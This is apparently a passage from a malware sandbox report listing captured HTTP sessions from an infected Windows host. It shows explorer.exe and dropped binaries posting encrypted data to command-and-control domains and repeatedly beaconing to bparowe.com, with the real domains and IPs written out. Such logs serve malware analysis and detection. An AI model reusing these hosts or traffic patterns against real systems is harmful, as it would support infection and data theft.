                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:17.782963037 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:18.056739092 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:17 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                246192.168.2.45947991.215.85.17802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:17.844309092 CET278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://rdxqiaoexlk.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:17.844388008 CET109OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:18.133367062 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:17 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                247192.168.2.459480185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:18.526864052 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:18.807797909 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:18 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                248192.168.2.45877992.240.253.3805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:19.048446894 CET233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                                                                                                                                content-length: 110
                                                                                                                                                                                                                                                                                                                                cache-control: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                249192.168.2.45877492.240.253.14805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:19.055176020 CET233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                                                                                                                                content-length: 110
                                                                                                                                                                                                                                                                                                                                cache-control: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                250192.168.2.459481185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:19.298017025 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:19.577332020 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:19 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                251192.168.2.459482185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:20.029340982 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:20.307749033 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:20 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                252192.168.2.459483185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:20.722752094 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:20.996633053 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:20 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                253192.168.2.459484185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:21.490683079 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:21.770193100 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:21 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                254192.168.2.459485185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:22.213870049 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:22.492155075 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                255192.168.2.459486185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:22.900614023 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:23.183790922 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                256192.168.2.459487185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:23.661863089 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:23.935547113 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                257192.168.2.459488185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:24.433948040 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:24.714416981 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:24 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                258192.168.2.459489185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:25.142229080 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:25.420391083 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                259192.168.2.459490185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:25.857008934 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:26.132292986 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                260192.168.2.459492185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:26.605365992 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:26.883315086 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                261192.168.2.459491180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:26.621114016 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://bpmxxeajhdv.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 314
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:26.621149063 CET314OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 40 c9 84
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA .[k,vu4@wQN}3tjD")j?Ho_{"&GIJO$ZM9`CDN/NYQ'#'6kMGvl|l>Cx
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:27.652844906 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                262192.168.2.459493185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:27.295738935 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:05:27.574795961 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:05:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
